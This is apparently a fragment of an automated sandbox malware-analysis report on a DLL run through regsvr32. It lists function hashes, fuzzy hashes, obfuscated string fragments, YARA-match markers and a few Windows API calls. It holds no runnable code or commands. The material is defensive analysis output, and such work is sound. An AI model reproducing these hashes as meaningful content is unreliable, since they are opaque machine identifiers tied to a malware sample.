                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                  • Instruction ID: ff33e713b9b9862e94e2d2fd4ae4d55f0027255630586c455cca821aadc81769
                                                  • Opcode Fuzzy Hash: 3c99f19865488fa949415da8e2229a8dc4eaaacedc1a65a8015e4c0ea1d70d8e
                                                  • Instruction Fuzzy Hash: 7041BE32909BC58AE6B08B14F8443AFB3A1F388355F50522996CD42BA8EB7ED095CF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$!Iv;$=`$M@$of?$uzxY
                                                  • API String ID: 0-1910763920
                                                  • Opcode ID: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                  • Instruction ID: 7899ed511868268ad7aea3719dccceda62fd29fa6bb16e154aa46d1db7c43d79
                                                  • Opcode Fuzzy Hash: 9693a8ffcd6589fd3dbfdbad085aa322119c3f1a6317bc180f44839f00dc24fe
                                                  • Instruction Fuzzy Hash: F172047190478C8BDB58DF68C88A69E7FE1FB84384F20461DF95A9B260D770D989CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .s$/$*$12.1.3$89$W0$j~L
                                                  • API String ID: 0-1551167702
                                                  • Opcode ID: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                  • Instruction ID: f5b8073de7550f00aae71ce47ac4d0d330c984d331b26572373d31fffc6277f7
                                                  • Opcode Fuzzy Hash: b1eb1fe3fa88397c885ab509abe1c858ffcdb74bf15ef161dec0971567ed18e8
                                                  • Instruction Fuzzy Hash: 9332237050C7848FC369DF68C58A65EBBF0FB8A744F004A1EF68687260D7B6D949CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$*I$;*v($;3$F9p$ef~j
                                                  • API String ID: 0-950528966
                                                  • Opcode ID: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                  • Instruction ID: 5057aee1002f2822c724537f3f36740fe0594223e2d956511feddf479ded4ebe
                                                  • Opcode Fuzzy Hash: 9500c32e6f155eacac3cfe5a03c267215382f5440a46099a8d521f2441a56deb
                                                  • Instruction Fuzzy Hash: 6A42E771144BCA8BCBB9CF24CC85BEF7BA0FB44306F145529D89A8A291DBB89745CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$9w$IX$M?@$jS<$M
                                                  • API String ID: 0-1157581923
                                                  • Opcode ID: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                  • Instruction ID: e375d1c8451a89c96fc0dfbd01d6dda6b37f4c7765b0f9ce143112ad2eac9b8a
                                                  • Opcode Fuzzy Hash: 49f1c8efd4ee46ecb9d969e0aa9b812bfdd9bd3000ec2742c71bf52f4d967f5b
                                                  • Instruction Fuzzy Hash: 8A32E4B0A147888BCBB8CF68C8897DD7BF0FB48318F90521DEA0A9B251DB745645CF59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$&n$1U$Oh$j/$X
                                                  • API String ID: 0-3716166881
                                                  • Opcode ID: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                  • Instruction ID: b98437ffb223a44b0e92d10549c73aaa59fdecde54cd589da16d290276777c9c
                                                  • Opcode Fuzzy Hash: 3ec52770ba243505623e348b6c36d4d02d94aade20e82fe7112f5902b3326bac
                                                  • Instruction Fuzzy Hash: D9F13C70508B88CFD7B9CF24D48969EBBF4FB84744F204A1EE5A59B260DBB09645CF42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: G8L$J9$ozq~$ss6$tiG$P;
                                                  • API String ID: 0-1765782432
                                                  • Opcode ID: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                  • Instruction ID: 77e5b6b93cc6977e5a95292e040e55b4553736c218ba0195107264470a30d31c
                                                  • Opcode Fuzzy Hash: c77c4daeda8c59326f72f8188263c488bfcd846ed7a7bd487d849044a826f1d5
                                                  • Instruction Fuzzy Hash: FCC1097050064D8FDF89DF28C89A6DE3BA1FB68398F51421DFC4A962A1C778D994CBC4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2893B
                                                  • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2894B
                                                  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28963
                                                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D2897B
                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2359E), ref: 000007FEF9D28998
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                  • String ID:
                                                  • API String ID: 1445889803-0
                                                  • Opcode ID: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                  • Instruction ID: 08a22431f858d3c52821bee646358606f5e13fcd060269a72eebdbe744b14aa1
                                                  • Opcode Fuzzy Hash: 3c45f80db2f34b613ab4c9fa771cbb066be9ba5f1b7e4cdc55cd1e9c18cefb40
                                                  • Instruction Fuzzy Hash: 7A21E62160AF0585DAB08B19FC5032E77E0E78DBA5F241235AADD83778EF3DD2948700
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,bF$-Ie:$Y$jc$_
                                                  • API String ID: 0-2562869522
                                                  • Opcode ID: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                  • Instruction ID: be835d82a8a11271eaf2d0d4144821f845ce411821323c63ff6fa91e08a90877
                                                  • Opcode Fuzzy Hash: 13dcfdf2b547f47b8e652e45a129a81bd12d479633329dbfd5d4c9c90b2a7465
                                                  • Instruction Fuzzy Hash: 2F82FC7190478C8BDBBDCF24C8466DE7BE1FB88744F104A1DEA5A8A350D7B49785CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$3'p$AVx.$R@\$|7}
                                                  • API String ID: 0-1377184578
                                                  • Opcode ID: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                  • Instruction ID: 11bdd15b6fdebef4e4e33012fe2102d5287f0ed75640ad066b8b9400528ec4a7
                                                  • Opcode Fuzzy Hash: 42416e948d3c9d06b93ab1f3a8ba6bb7b4031ce7609dd7b48ddc645cdcf3989a
                                                  • Instruction Fuzzy Hash: F0820774604BC88BDBB8DF24DC857CD7BE0FB86305F20561DD95E9AA60CBB89645CB02
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :_$DHM$J? $ioF$IE
                                                  • API String ID: 0-1950181368
                                                  • Opcode ID: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                  • Instruction ID: dfce06ae3f2776b2053eb0988bfb390665c026a97965fcc171ceda4eb787facd
                                                  • Opcode Fuzzy Hash: 259697ebe02e240ff157c8cb6796f3c563015099138ecee0effd1804923e127d
                                                  • Instruction Fuzzy Hash: 4E02F470A0470DEFDB99DF68C089A8EBBF1FB48344F40856AE809EB250D7749A59CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \=V$h9&$n"$wPT$5Z3
                                                  • API String ID: 0-226182706
                                                  • Opcode ID: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                  • Instruction ID: 86bcb4527d36acdb60297ed143c12856cad003a08b6179b63c097fe4f6929213
                                                  • Opcode Fuzzy Hash: ce1cfba10c1d8d8dcb7fefef68f5dbb71196a1667c8063e3a43dba33cd0a9cce
                                                  • Instruction Fuzzy Hash: F7E11871A0468C8BDF59CFE8C48ABDDBBF2FB54348F004129D906BB298D774951ACB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 2k$5.A$h$Tv$|
                                                  • API String ID: 0-899094025
                                                  • Opcode ID: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                  • Instruction ID: fdc8e1fcc57a9d708ca924da4610569f3fbcb91b13fa75a00635c4e08a114872
                                                  • Opcode Fuzzy Hash: db2f60ac8ea9c811a7e8a42be398396c7662d8ce257af2786f0ca87739e0812c
                                                  • Instruction Fuzzy Hash: 2CE1B2B190474C8FDB69CFA8C48969DBFF1FB48348F20421DE869AB262D7749945CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID: `H$h$T$TaK$_
                                                  • API String ID: 963392458-2145750592
                                                  • Opcode ID: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                  • Instruction ID: 3659a6701c3bc18b063cae63192a65d6a0dab5b7a081606fb1710f1fc1c5873b
                                                  • Opcode Fuzzy Hash: ffc2d6b317b26a71c8140759e67952dd965db1d69b0c3f8b48f7c1dc501504e9
                                                  • Instruction Fuzzy Hash: 8FA10771D087188FDB68DFA9D8856CDBBF1FB48308F20421DE45AA7252DB70A945CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Bwu$L>yL${NC$^K
                                                  • API String ID: 0-3175627499
                                                  • Opcode ID: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                  • Instruction ID: fbf4dbbb098cc7df43bbc7889590cb4d1f5602d02220e4776b40022e4a41187c
                                                  • Opcode Fuzzy Hash: 50b0aea139128d6f7c402ec74795df524ca4165021b819f0d064fd60e31d3d12
                                                  • Instruction Fuzzy Hash: 13322B70908B488FE769CF78C48665EBBF0FB84748F204A1DE6A697270DB749945CF42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %$N'}$Od^v$dS
                                                  • API String ID: 0-4183360357
                                                  • Opcode ID: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                  • Instruction ID: 281f3f4e81126c35bb2be7146c604e5ee0be10d432db17f45780181539d507de
                                                  • Opcode Fuzzy Hash: 3e0f3c17ca57f4ad1f3f1084ac04447848ab7be5cba89c2bccd8803fee9248a0
                                                  • Instruction Fuzzy Hash: 3342D9B190438C8BDBB8CF64C8896DD7BF1FB48318F50852DDA199B251DBB05685CF98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +Gq$__Z%$|deb$sH
                                                  • API String ID: 0-2072550713
                                                  • Opcode ID: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                  • Instruction ID: 26b4cb1fb47336c1432c1659c452027cf20818b998f95a2bcb6bb32f36742f2f
                                                  • Opcode Fuzzy Hash: 094eb7f958d011cdb8ce81038bafb84045d4698861e966cd2ff6582630ea1e3f
                                                  • Instruction Fuzzy Hash: 0FD1137160270DCBDB68DF28C68A6DE3BE1FF48308F504129FC5A96262D774D929CB49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 5P$8r$:=$xX
                                                  • API String ID: 0-2901174047
                                                  • Opcode ID: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                  • Instruction ID: 9c4e4b6ab2cee8fe4f9bfbf45665c48137a45671121b1b9ae43ff9fbf3dba1fc
                                                  • Opcode Fuzzy Hash: 6865726b2104b4eb7ff299f8486c8d696ddfefbd7c25c2068e726a6c762a58db
                                                  • Instruction Fuzzy Hash: 35E1357191034D9BCB88DF64C8899DD7BF1FB48398F516219FC4AAB260C7789585CF88
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &$Ro$X|$WW
                                                  • API String ID: 0-419055892
                                                  • Opcode ID: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                  • Instruction ID: 8aa2c3e6b8818245adabd520600babaa531b4d52059a868131a34f3b668756e0
                                                  • Opcode Fuzzy Hash: ca40c88e9c0bb890938dc8e49850b9c6f80446ec0944c9f0783c0d192955d258
                                                  • Instruction Fuzzy Hash: 1EC1FDB150570DCBDB68CF28C58A6DE3BE5FB48308F108129FC5A9B2A0D774EA59CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tR$tR$uxX4$6)
                                                  • API String ID: 0-566208085
                                                  • Opcode ID: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                  • Instruction ID: 21dbc208fb27f88b672f000d339ef1a4b78a4386f06e48fd8b1f03ba1e8317ad
                                                  • Opcode Fuzzy Hash: c081e77f49af2eaf56923f63e50e632cb9bf55942161f3f8d2179c3bd288189e
                                                  • Instruction Fuzzy Hash: 84D1E5705087CC8BDBFEDF68C8857DA7BA8FB44748F104219EA0A9E269CB745749CB41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 57$7|$K-~$`by
                                                  • API String ID: 0-1764728439
                                                  • Opcode ID: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                  • Instruction ID: 0ef0f182f1da72c174031fc5be9a225670cb57be642fb1d84f9edf9d7426cf45
                                                  • Opcode Fuzzy Hash: 3d75101ad2ff9bc1d340fad9c74c74685bf15c99ef7bfcf0826df8ee18983ab7
                                                  • Instruction Fuzzy Hash: 5EC1227510160CCBDBA8DF38C48A6DD3BE1FF58308F605129FC2A9A266C7B4D959CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: #X$"*$DgQ$6i
                                                  • API String ID: 0-2770996495
                                                  • Opcode ID: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                  • Instruction ID: 504b32a01a029d54a9cc7c4b79b1c57dce6396aa3b2efbc72770fc67d95dc726
                                                  • Opcode Fuzzy Hash: 820f3a7f2831d7bc6be119a51f5435b60720529f940ec106d6c272ece28fcda8
                                                  • Instruction Fuzzy Hash: CCB10871A0870CABDFA9DFA8E4896DDBBF1FB44344F00451DE446A7290DB749A0ECB85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: O:M$iJ"]$p$p
                                                  • API String ID: 0-2745201584
                                                  • Opcode ID: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                  • Instruction ID: 8b688321e04c0e646b0fc78ee6d67cd940f90a9f6723fb1f8222d7259e9641f4
                                                  • Opcode Fuzzy Hash: c580725723075c93842e669fadfa9b9fa9ca71e2e3fa7497301af4adcf51def7
                                                  • Instruction Fuzzy Hash: 8AB10070D143098BCB89DFA8D486AEEBBF0FB48304F14851EE856B7250D7749A44CFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  • HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25EF9
                                                  • HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d)., xrefs: 000007FEF9D25FE7
                                                  • %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d)., xrefs: 000007FEF9D2617C
                                                  • HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d)., xrefs: 000007FEF9D260C7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926240012.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                  • Associated: 00000003.00000002.926236480.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926256789.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926274348.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                  • Associated: 00000003.00000002.926337825.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: %hs located at 0x%p is %Iu bytes long.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: after %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory after end of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: before %hs block (#%d) at 0x%p.CRT detected that the application wrote to memory before start of heap buffer.Memory allocated at %hs(%d).$HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.Memory allocated at %hs(%d).
                                                  • API String ID: 0-1867057952
                                                  • Opcode ID: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                  • Instruction ID: 7eafebeb16ca57a5525b51ed0f378306bc52b64ad103bedb915b9118f6e813be
                                                  • Opcode Fuzzy Hash: 2a9d8457aa34911385b660402f71547a5181f90184c5f28ce50b42f7ee7f8c58
                                                  • Instruction Fuzzy Hash: 1A810C36A18B4586DB94CF59E49072EB7A0F3C4794F610526EACD87BA8DBBED441CB00
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8('$6fA$9\D$OG3
                                                  • API String ID: 0-2292045659
                                                  • Opcode ID: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                  • Instruction ID: ef0df636cc5d4b1adb12f513697d006f7e6ff77cbfd46ce7bca5e6c4611c7a17
                                                  • Opcode Fuzzy Hash: 075f2f4683c67ac2050461b4b976e23f7824189084b04fb6fcbf6660b49be205
                                                  • Instruction Fuzzy Hash: 6E8166B591130DCFDB98CF28C18A5CA3BA8FF55318F00412AFC1E9A264D3B4E959CB46
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !j$IzY$w4$0Oa
                                                  • API String ID: 0-1210086663
                                                  • Opcode ID: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                  • Instruction ID: d6ae16ce1753066c3a100fad89cd7b933425bd3752a83aacc50f13ca8011d066
                                                  • Opcode Fuzzy Hash: d22984424f9e842513d0b81fbf00519d97f66b1438588327bee25b78db1a615b
                                                  • Instruction Fuzzy Hash: 4E41CFB090034E8BCF88CF65C48A5DE7FB0FB68358F104619E916A6250D7B896A9CFC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !fl$>q$>q
                                                  • API String ID: 0-3196423155
                                                  • Opcode ID: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                  • Instruction ID: 6e0169028e0bb78a63dbed9d1dbc36ce20ef11fe4735bb4ca27ada0b4c61fd75
                                                  • Opcode Fuzzy Hash: dccb224850b43dda665c2028c8e90cf7ac528c4769e1ed18f59b4bae66e0f67a
                                                  • Instruction Fuzzy Hash: 18022574A0670CDBCBA9CFA8E48A69DBBF1FF14388F104119F816A7261C7B49919CB45
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.926206063.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "Gd$C2$HG
                                                  • API String ID: 0-142661339
                                                  • Opcode ID: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                  • Instruction ID: f3040b85d87bafdcd4b0814e46a5c4b4479db0c4bbfe4c952327208bca537128
                                                  • Opcode Fuzzy Hash: 9dab0733114c64659f8f05551e608b0018560ea730d37400ebf1bc7fe80e5bb8
                                                  • Instruction Fuzzy Hash: 20C112719047CD8FDB89CFA8C88A6ED7BB1FB48354F104229F80697660DBB4D949CB81
                                                  Uniqueness

